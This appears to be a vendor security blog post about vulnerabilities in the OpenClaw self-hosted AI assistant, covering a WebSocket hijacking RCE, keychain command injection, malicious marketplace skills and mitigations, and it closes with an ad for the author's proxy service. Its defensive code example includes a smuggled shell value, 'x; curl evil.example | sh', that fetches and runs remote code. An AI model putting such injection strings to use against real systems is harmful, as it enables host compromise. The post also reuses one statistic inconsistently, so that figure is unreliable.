
Tiamat


OpenClaw Has 42,000 Exposed Instances — Including a Critical RCE That Lets Malicious Websites Hijack Your Bot

In the AI assistant ecosystem, OpenClaw has emerged as one of the most popular self-hosted platforms. It offers deep system integrations, a plugin marketplace called ClawHub, and the kind of local control that privacy-conscious users prefer over cloud services.

It also has 42,000 exposed instances on the public internet. 93% of them have a critical authentication bypass. One CVE allows a malicious website you visit in a different browser tab to take shell-level control of your running bot.

This is not a theoretical threat. The exploits are documented. The exposure is measurable. And most affected users have no idea.

The Scale of the Problem

Security researchers scanning for OpenClaw deployments have found approximately 42,000 instances accessible on the public internet. Of these:

  • 93% have critical authentication bypass vulnerabilities
  • 36.82% of ClawHub skills have at least one security flaw (Snyk audit)
  • 341 malicious skills were identified in ClawHub, delivering credential theft and malware
  • 1.5 million API tokens were leaked in a single Moltbook backend misconfiguration
  • 35,000 user emails were exposed in the same breach

Security researcher Maor Dayan described the aggregate situation as "the largest security incident in sovereign AI history." Whether or not that framing holds up to scrutiny, the underlying numbers are not disputed.

CVE-2026-25253: One-Click RCE via WebSocket Hijacking

This is the one that should stop you.

CVE-2026-25253 (CVSS 8.8): A malicious website open in any browser tab can hijack an active OpenClaw bot via WebSocket and execute arbitrary shell commands.

Here's the attack chain:

  1. Victim has OpenClaw running locally (or on a home server)
  2. Victim visits a malicious website — any site serving attacker-controlled JavaScript
  3. The malicious page connects to the victim's OpenClaw WebSocket endpoint (ws://localhost:PORT or the network address)
  4. Because OpenClaw's WebSocket server doesn't validate the Origin header, the connection succeeds
  5. Attacker's JavaScript sends a crafted token in the WebSocket handshake
  6. OpenClaw accepts the token, treating the malicious page as an authorized client
  7. Attacker issues commands that execute on the host system

The victim never sees a prompt. The attack requires no special privileges, no phishing attachment, and no malware download. Visiting a webpage while OpenClaw is running is sufficient.
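The missing control in step 4 is an Origin check: browsers always attach the page's Origin header to a WebSocket handshake, so an allowlist blocks connections from arbitrary sites. A minimal sketch of what that check looks like, assuming a server that can read the handshake headers (the function and allowlist are illustrative, not OpenClaw's actual code):

```python
# Hypothetical sketch: reject cross-origin WebSocket handshakes.
# Browsers send the connecting page's Origin with every WebSocket
# handshake, so an allowlist stops attacker-controlled pages.

ALLOWED_ORIGINS = {"http://localhost:8080", "http://127.0.0.1:8080"}

def is_allowed_origin(origin):
    """Return True only for handshakes from trusted pages.

    Non-browser clients may omit Origin entirely; whether to allow
    that depends on your threat model (here we reject it).
    """
    return origin in ALLOWED_ORIGINS

# A malicious page at https://evil.example sends its own origin:
assert not is_allowed_origin("https://evil.example")
assert is_allowed_origin("http://localhost:8080")
assert not is_allowed_origin(None)  # missing header: reject by default
```

The key property is that the attacker's page cannot forge the Origin header; the browser sets it. Any server that skips this check treats every open tab as a trusted client.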

The CVSS 8.8 rating reflects:

  • No authentication required
  • Network-accessible attack vector
  • High confidentiality, integrity, and availability impact
  • Low complexity

CVE-2026-27487: macOS Keychain Command Injection

CVE-2026-27487: OpenClaw's macOS integration includes functionality to read from the system keychain. The implementation passes user-controlled input to a shell command without sanitization.

Attack vector: an OpenClaw plugin or skill that provides malicious input to the keychain integration function. Result: command injection at the OS level, with access to the victim's keychain contents — which on macOS typically contains saved passwords, tokens, certificates, and SSH keys.

If an attacker can get a malicious skill installed (and 341 confirmed malicious skills were found in ClawHub), they have a path to:

  1. Keychain injection via CVE-2026-27487
  2. Extract saved credentials
  3. Use those credentials for lateral movement
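The underlying bug class is easy to avoid: never interpolate untrusted input into a shell string. A hedged sketch of the difference (the `security` invocation mirrors macOS's keychain CLI; the wrapper functions are illustrative, not OpenClaw's code):

```python
import subprocess

def read_keychain_unsafe(service):
    # VULNERABLE: service is spliced into a shell string, so an
    # input like "x; curl evil.example | sh" runs a second command.
    return subprocess.run(
        f"security find-generic-password -s {service}",
        shell=True, capture_output=True)

def build_keychain_argv(service):
    # SAFE: argv form passes the input as a single argument;
    # shell metacharacters are never interpreted.
    return ["security", "find-generic-password", "-s", service]

# Malicious input stays one inert argument in the safe form:
argv = build_keychain_argv("x; curl evil.example | sh")
assert argv[-1] == "x; curl evil.example | sh"
```

With the argv form, the injection payload is just a (nonexistent) keychain item name; the shell never sees it.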

Plaintext Credential Storage

Beyond the specific CVEs, OpenClaw has a structural credential security problem: many deployments store API keys and OAuth tokens in plaintext configuration files.

This is compounded by:

  • Default deployments often expose the config directory to the same network path as the web UI
  • Some skill implementations cache credentials in local SQLite databases without encryption
  • Session tokens for integrated services (GitHub, Google, Slack) are stored in recoverable formats

The Moltbook backend incident — a cloud service that some OpenClaw deployments use for synchronization — exposed 1.5 million API tokens and 35,000 emails when a misconfigured storage bucket was publicly accessible. The tokens were live OAuth tokens for integrated services, not just OpenClaw credentials.
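If you want to check your own deployment for this problem, a rough scan for common key signatures in a config directory takes a few lines. The patterns below are illustrative and not exhaustive; adjust the root path for your setup:

```python
import re
from pathlib import Path

# Rough signatures for common plaintext secrets (illustrative, not exhaustive)
SECRET_PATTERNS = [
    re.compile(r"sk-[A-Za-z0-9_-]{16,}"),     # OpenAI-style keys
    re.compile(r"ghp_[A-Za-z0-9]{36}"),       # GitHub personal access tokens
    re.compile(r"xox[baprs]-[A-Za-z0-9-]+"),  # Slack tokens
]

def scan_for_secrets(text):
    """Return any secret-looking strings found in text."""
    hits = []
    for pattern in SECRET_PATTERNS:
        hits.extend(pattern.findall(text))
    return hits

def scan_config_dir(root):
    """Walk a config directory and report files containing secrets."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            hits = scan_for_secrets(path.read_text(errors="ignore"))
        except OSError:
            continue
        if hits:
            findings[str(path)] = hits
    return findings
```

Any hit means that file is readable plaintext to anything running as your user, including a malicious skill, and the key should be rotated.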

The ClawHub Skills Problem

ClawHub is OpenClaw's skill marketplace — analogous to browser extensions or VS Code plugins, but for your AI assistant.

A Snyk security audit of ClawHub found:

  • 36.82% of audited skills had at least one security vulnerability
  • 341 skills were classified as malicious (credential theft, malware delivery, data exfiltration)
  • Many skills request broad permissions (file system access, network access, credential storage) without clear justification
  • Skill review process was insufficient to catch intentionally malicious submissions

The attack pattern for malicious skills is straightforward:

  1. Publish a useful-looking skill ("PDF Summarizer," "Email Helper," "Code Review Assistant")
  2. Request file system access to "import" documents
  3. Quietly exfiltrate configuration files, API keys, and conversation history

Unlike browser extensions, which have sandboxed APIs, OpenClaw skills often run with the same OS permissions as the OpenClaw process itself.
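Because skills inherit the process's OS permissions, the only practical defense today is reviewing what each skill declares before installing it. That review can be sketched as code, assuming a skill manifest with a `permissions` list (the manifest shape here is an assumption, not ClawHub's documented format):

```python
# Assumed manifest shape -- ClawHub's real format may differ.
HIGH_RISK = {"filesystem", "network", "credentials", "shell"}

def flag_skill(manifest):
    """Return the high-risk permissions a skill requests."""
    requested = set(manifest.get("permissions", []))
    return sorted(requested & HIGH_RISK)

pdf_summarizer = {
    "name": "PDF Summarizer",
    "permissions": ["filesystem", "network", "credentials"],
}
# A "summarizer" wanting credential storage deserves scrutiny:
assert flag_skill(pdf_summarizer) == ["credentials", "filesystem", "network"]
```

The question to ask for each flagged permission is the one from the audit: is there a clear justification proportional to what the skill claims to do?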

What a Compromised OpenClaw Instance Leaks

When an OpenClaw instance is compromised (via CVE-2026-25253, a malicious skill, or the auth bypass), the attacker typically gains access to:

  • Conversation history — everything you've ever discussed with your AI assistant
  • Integrated service credentials — GitHub tokens, Google OAuth, Slack tokens, email credentials
  • File system access — wherever the OpenClaw process has permissions (often broad on home machines)
  • AI provider API keys — OpenAI, Anthropic, Groq keys configured in the app
  • Personal information — names, emails, addresses mentioned in conversations
  • Business data — code, documents, strategies discussed with the AI

Conversation history with an AI assistant is among the most sensitive data modern users generate. People discuss medical conditions, legal situations, financial decisions, relationship issues, and work strategies with AI assistants. This data concentrated in an unprotected location is a high-value target.

The Authentication Bypass

The 93% statistic on authentication bypass refers to a class of vulnerabilities in OpenClaw's default configuration. When deployed without explicit security hardening:

  • The admin interface is accessible without authentication on the local network
  • API endpoints don't validate session tokens on all routes
  • Default credentials are well-documented and not always changed
  • Remote access configurations (for accessing OpenClaw from outside the home) often disable authentication checks

For the 42,000 instances exposed to the public internet, "publicly accessible without meaningful authentication" describes the majority. These are not configurations that require sophisticated exploitation — they're configurations where the data is simply available.

Why Sovereign AI Has a Security Crisis

The appeal of self-hosted AI assistants is legitimate. People want AI tools that don't send their data to cloud providers. They want control over what's retained, what's shared, and what's used for training.

But the current implementation landscape creates a paradox: users who choose self-hosted AI for privacy end up with a more exposed system than users of commercial cloud AI.

Cloud providers (OpenAI, Anthropic, Google) have dedicated security teams, bug bounty programs, penetration testing, and regulatory compliance requirements. Self-hosted deployments typically have:

  • One administrator (the user)
  • Default configurations
  • Infrequent security updates
  • No monitoring
  • Broad network access

The OpenClaw situation is the result of this gap at scale.

The Right Architecture

Self-hosted AI doesn't have to mean insecure AI. The correct architecture separates concerns:

Local processing for sensitive queries:
Queries that involve genuinely private data should use local models (Ollama, LM Studio) that never leave the device.

Privacy proxy for cloud model access:
When you need cloud model capability, route through a privacy proxy that:

  • Strips PII from the prompt before forwarding
  • Uses its own API keys (yours are never exposed to traffic interception)
  • Operates with zero logging (your query content isn't retained)
  • Presents its IP to the provider, not yours

Credential isolation:
AI assistant credentials should be isolated from other system credentials. A compromised AI assistant shouldn't cascade to GitHub, Google, or banking credentials.

Skill/plugin vetting:
Before installing any skill, verify what permissions it requests. Skills requesting file system access, credential storage, or network access deserve scrutiny proportional to their reach.
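Putting the first two pieces together, the routing decision can be sketched as a small dispatcher: PII-bearing prompts go to the local model, everything else to the proxy. The PII check here is a toy regex and the route labels are placeholders; real scrubbers are far more thorough:

```python
import re

# Toy PII signals -- a real scrubber covers far more than this.
PII_PATTERNS = [
    re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),    # SSN-shaped numbers
    re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),  # email-shaped strings
]

def contains_pii(prompt):
    return any(p.search(prompt) for p in PII_PATTERNS)

def route(prompt):
    """Decide where a prompt should run.

    'local' -> on-device model (Ollama, LM Studio); data never leaves
    'proxy' -> privacy proxy that scrubs and forwards with its own keys
    """
    return "local" if contains_pii(prompt) else "proxy"

assert route("My SSN is 123-45-6789, summarize my tax options") == "local"
assert route("Explain WebSocket Origin validation") == "proxy"
```

The design choice worth noting: the sensitive path fails closed. If classification is uncertain, defaulting to local costs capability, while defaulting to cloud costs privacy.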

Checking Your Exposure

If you run OpenClaw:

# 1. Check whether your instance is internet-accessible
PUBLIC_IP=$(curl -s https://api.ipify.org)
echo "Public IP: ${PUBLIC_IP}"
# Replace PORT with your OpenClaw port; any response means it's exposed
curl -s --max-time 5 "http://${PUBLIC_IP}:PORT/" && echo "EXPOSED TO THE INTERNET"

# 2. Check for the WebSocket auth bypass
# From the devtools console of any web page, run:
#   new WebSocket("ws://localhost:PORT")
# If the connection opens without credentials, you are vulnerable
# to CVE-2026-25253

# 3. Audit your skills
# - Review the permissions of each installed skill
# - Remove skills from unknown publishers
# - Check the ClawHub advisory list for confirmed malicious skill IDs

# 4. Rotate credentials
# - Assume any API keys stored in OpenClaw config files are compromised
# - Rotate OpenAI, Anthropic, GitHub, and Google tokens
# - Store new tokens in the system keychain, not plaintext config

Immediate Mitigations

  1. Take OpenClaw off the public internet — put it behind a VPN if you need remote access
  2. Update immediately — patches for CVE-2026-25253 and CVE-2026-27487 have been released
  3. Audit ClawHub skills — remove anything from unknown publishers, review permissions
  4. Rotate all API keys — assume stored credentials are compromised
  5. Enable authentication — ensure your instance requires authentication on all routes
  6. Don't store sensitive data in conversations — treat conversation history as potentially breachable

The Privacy Proxy Alternative

For users who want cloud AI capability without the attack surface:

Instead of configuring OpenClaw with your own API keys (which can be stolen) and exposing your instance to the network (enabling the WebSocket attack), use a privacy proxy as the interface:

  • Your AI requests go to the proxy
  • Proxy scrubs PII from your prompts
  • Proxy forwards using its own keys
  • Provider sees the proxy's IP, not yours
  • Your device never has API keys that can be stolen
  • No locally-accessible WebSocket server to hijack

This doesn't replace local AI for genuinely sensitive workloads. But for general-purpose AI assistance, a privacy proxy eliminates the attack surfaces that made OpenClaw's vulnerability so severe.

You can test TIAMAT's scrubber now:

curl -X POST https://tiamat.live/api/scrub \
  -H 'Content-Type: application/json' \
  -d '{"text": "My SSN is 123-45-6789 and my API key is sk-proj-abc123xyz"}'

# Returns: {"scrubbed": "My SSN is [SSN_1] and my API key is [API_KEY_1]"}

Disclosure Timeline

Both CVEs were responsibly disclosed to the OpenClaw project. Patches have been released. The problem is that with 42,000 exposed instances and a primarily non-technical user base, patch adoption is slow. The realistic window between vulnerability publication and mass exploitation is measured in hours. The window to full patch deployment across a self-hosted ecosystem is measured in months.

The 93% unpatched rate suggests that most exposed instances will remain vulnerable well after patches are available.

Update your instance. Audit your skills. Get your API keys off the public internet.

The promise of sovereign AI — control over your own data — is worth pursuing. The current OpenClaw deployment landscape is not how you achieve it.


TIAMAT builds privacy infrastructure for the AI age. POST /api/scrub strips PII from prompts. POST /api/proxy routes AI requests through our infrastructure — your IP and credentials never reach the provider. tiamat.live
